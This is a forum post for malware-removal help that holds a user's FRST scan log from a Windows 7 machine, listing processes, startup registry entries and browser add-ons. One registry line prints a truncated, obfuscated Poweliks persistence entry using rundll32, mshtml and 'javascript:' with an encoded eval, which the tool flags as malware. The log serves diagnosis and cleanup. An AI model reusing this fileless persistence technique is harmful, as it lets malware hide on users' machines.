Thank you for your help!
I have the results of the FRST below:
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 14-12-2014 01
Ran by Chris (administrator) on DESKTOP on 16-12-2014 05:56:01
Running from C:\Users\Chris\Desktop
Loaded Profiles: Chris & UpdatusUser & Kids (Available profiles: Chris & UpdatusUser & Kids)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgrsa.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgcsrva.exe
(Logitech, Inc.) C:\Program Files\Logitech\SolarApp\L4301_Solar.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\avp.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe
(Logitech Inc.) C:\Program Files\Common Files\logishrd\LVMVFM\LVPrcSrv.exe
() C:\Program Files (x86)\Clarus\Samsung SecretZone\MSSvc.exe
(Logitech Inc.) C:\Program Files (x86)\Common Files\LogiShrd\LVMVFM\LVPrS64H.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgnsa.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.2.0\ToolbarUpdater.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.2.0\loggingserver.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Symantec) C:\Program Files (x86)\Norton Ghost\Shared\Drivers\SymSnapServicex64.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Ghost\Agent\VProSvc.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\avpui.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Microsoft Corporation) C:\Program Files\Microsoft Device Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Device Center\ipoint.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
(Microsoft Corporation) C:\Users\Chris\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgui.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Ghost\Agent\VProTray.exe
() C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe
(CANON INC.) C:\Program Files (x86)\Canon\Canon IJ Network Scan Utility\CNMNSUT.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe
() C:\Program Files (x86)\Common Files\LogiShrd\LQCVFX\COCIManager.exe
(Samsung Electronics.) C:\Program Files (x86)\Samsung SSD Magician\Samsung Magician.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\CSISYNCCLIENT.EXE
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\SelfServicePlugin\SelfService.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\Receiver\Receiver.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\SelfServicePlugin\SelfServicePlugin.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\AuthManager\AuthManSvr.exe
(Citrix Systems, Inc.) C:\Users\Chris\AppData\Local\Citrix\ICA Client\wfcrun32.exe
(Citrix Systems, Inc.) C:\Users\Chris\AppData\Local\Citrix\ICA Client\concentr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\avpui.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Microsoft Corporation) C:\Program Files\Microsoft Device Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Device Center\ipoint.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgui.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Ghost\Agent\VProTray.exe
() C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe
(CANON INC.) C:\Program Files (x86)\Canon\Canon IJ Network Scan Utility\CNMNSUT.exe
(Futuredial Inc.) C:\Program Files (x86)\ASUS\ASUS Sync\asusUPCTLoader.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
() C:\Program Files (x86)\Common Files\LogiShrd\LQCVFX\COCIManager.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9642528 2009-12-03] (Realtek Semiconductor)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [1796056 2014-08-19] (NVIDIA Corporation)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [IntelliType Pro] => c:\Program Files\Microsoft Device Center\itype.exe [1464928 2012-06-26] (Microsoft Corporation)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft Device Center\ipoint.exe [2004584 2012-06-26] (Microsoft Corporation)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe [767312 2009-09-03] (CANON INC.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2710856 2009-11-01] (CANON INC.)
HKLM-x32\...\Run: [NWEReboot] => [X]
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2013\avgui.exe [4411952 2014-11-04] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [507776 2014-10-07] (Oracle Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2011-10-24] (Apple Inc.)
HKLM-x32\...\Run: [Norton Ghost 15.0] => C:\Program Files (x86)\Norton Ghost\Agent\VProTray.exe [2598760 2010-03-03] (Symantec Corporation)
HKLM-x32\...\Run: [LogitechQuickCamRibbon] => C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe [2793304 2009-10-14] ()
HKLM-x32\...\Run: [IJNetworkScanUtility] => C:\Program Files (x86)\Canon\Canon IJ Network Scan Utility\CNMNSUT.exe [140640 2009-09-28] (CANON INC.)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [703888 2013-08-30] (Cisco Systems, Inc.)
HKLM-x32\...\Run: [ASUS Sync Loader] => C:\Program Files (x86)\ASUS\ASUS Sync\asusUPCTLoader.exe [638976 2013-03-01] (Futuredial Inc.)
HKLM-x32\...\Run: [AdobeCS4ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe [611712 2008-08-14] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1021128 2014-11-20] (Adobe Systems Incorporated)
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005 Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot% <====== ATTENTION
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005 Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir% <====== ATTENTION
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-02-25] (Google Inc.)
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7777560 2014-11-13] (SUPERAntiSpyware)
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\Run: [SkyDrive] => C:\Users\Chris\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe [277672 2014-09-24] (Microsoft Corporation)
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\Run: [msnmsgr] => C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe [4240760 2010-11-10] (Microsoft Corporation)
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\Run: [GoogleChromeAutoLaunch_4E6299B33FA0592A57BB7C6E94F010D2] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [856904 2014-12-05] (Google Inc.)
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\RunOnce: [Adobe Speed Launcher] => 1418680399
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {1825dfb8-901b-11df-ac7a-001bfcdb2b00} - F:\setup.exe -a
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {1a642ce1-fa1b-11e2-a7cc-001bfcdb2b00} - H:\KDMElite.exe
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {2ff0a168-70b4-11e4-bba4-001bfcdb2b00} - H:\VerizonSWUpgradeAssistantLauncher.exe
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {40be6538-fd3f-11de-bc3d-001bfcdb2b00} - E:\Autoplay.exe -auto
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {8ec01e68-0b46-11e4-90c1-001bfcdb2b00} - G:\MotoCastSetup.exe -a
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {d39a215e-12aa-11e2-9a43-001bfcdb2b00} - G:\MotoCastSetup.exe -a
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {f68261b2-e74c-11de-bc75-001bfcdb2b00} - F:\SETUP.EXE
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-02-25] (Google Inc.)
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\RunOnce: [Adobe Speed Launcher] => 1418684812
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\system32\Macromed\Flash\FlashUtil64_15_0_0_246_ActiveX.exe [540848 2014-12-09] (Adobe Systems Incorporated)
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\MountPoints2: {2ff0a168-70b4-11e4-bba4-001bfcdb2b00} - H:\VerizonSWUpgradeAssistantLauncher.exe
AppInit_DLLs-x32: C:\Users\Chris\AppData\Local\Citrix\ICACLI~1\RSHook.dll => C:\Users\Chris\AppData\Local\Citrix\ICA Client\RSHook.dll [256568 2012-12-14] (Citrix Systems, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\vpngui.exe.lnk
ShortcutTarget: vpngui.exe.lnk -> C:\Windows\Installer\{467D5E81-8349-4892-9E81-C3674ED8E451}\Icon09DB8A851.exe ()
Startup: C:\Users\Kids\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Chris\AppData\Roaming\Dropbox\bin\DropboxExt64.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Chris\AppData\Roaming\Dropbox\bin\DropboxExt64.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Chris\AppData\Roaming\Dropbox\bin\DropboxExt64.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Chris\AppData\Roaming\Dropbox\bin\DropboxExt64.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Chris\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Chris\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Chris\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
BootExecute: autocheck autochk * sdnclean64.exe
GroupPolicyUsers\S-1-5-21-2526012750-3186116482-2568347101-1005\User: Group Policy restriction detected <======= ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache =
http://www.msn.com/
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache =
http://www.msn.com/
SearchScopes: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL =
https://mysearch.avg.com/search?cid={137244B2-7857-4E68-9CF5-46DD514DE27F}&mid=25e551794be5d82260c1c81e1e4b42aa-268e993bd84c66e058eb84a7569d70ada5bb6563&lang=en&ds=AVG&coid=avgtbavg&cmpid=1214tb&pr=fr&d=2014-02-05 21:32:45&v=18.2.0.829&pid=safeguard&sg=0&sap=dsp&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2526012750-3186116482-2568347101-1005 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL =
https://mysearch.avg.com/search?cid={137244B2-7857-4E68-9CF5-46DD514DE27F}&mid=25e551794be5d82260c1c81e1e4b42aa-268e993bd84c66e058eb84a7569d70ada5bb6563&lang=en&ds=AVG&coid=avgtbavg&cmpid=1214tb&pr=fr&d=2014-02-05 21:32:45&v=18.2.0.829&pid=safeguard&sg=0&sap=dsp&q={searchTerms}
BHO: Content Blocker Plugin -> {03C04F0A-E2A3-4F7F-BA30-BFA06FFD1358} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Skype add-on for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO: Virtual Keyboard Plugin -> {B5D5BB14-C8E2-478D-9C97-574AC10AF9E8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation)
BHO: Safe Money Plugin -> {E3D96E85-529D-4269-AC6A-97CF9E2221E3} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)
BHO-x32: Content Blocker Plugin -> {03C04F0A-E2A3-4F7F-BA30-BFA06FFD1358} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)
BHO-x32: ZD Manager IE Plugin -> {18D6D197-45BB-465B-ADC0-274A70B49B55} -> C:\Program Files (x86)\ZD Systems\ZD Manager\ZDManager.dll ()
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll (Microsoft Corporation)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Skype Browser Helper -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Virtual Keyboard Plugin -> {B5D5BB14-C8E2-478D-9C97-574AC10AF9E8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Safe Money Plugin -> {E3D96E85-529D-4269-AC6A-97CF9E2221E3} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} - No File
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - No File
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {C55BBCD6-41AD-48AD-9953-3609C48EACC7} - No File
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1005 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1005 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.2.0\ViProtocol.dll (AVG Secure Search)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
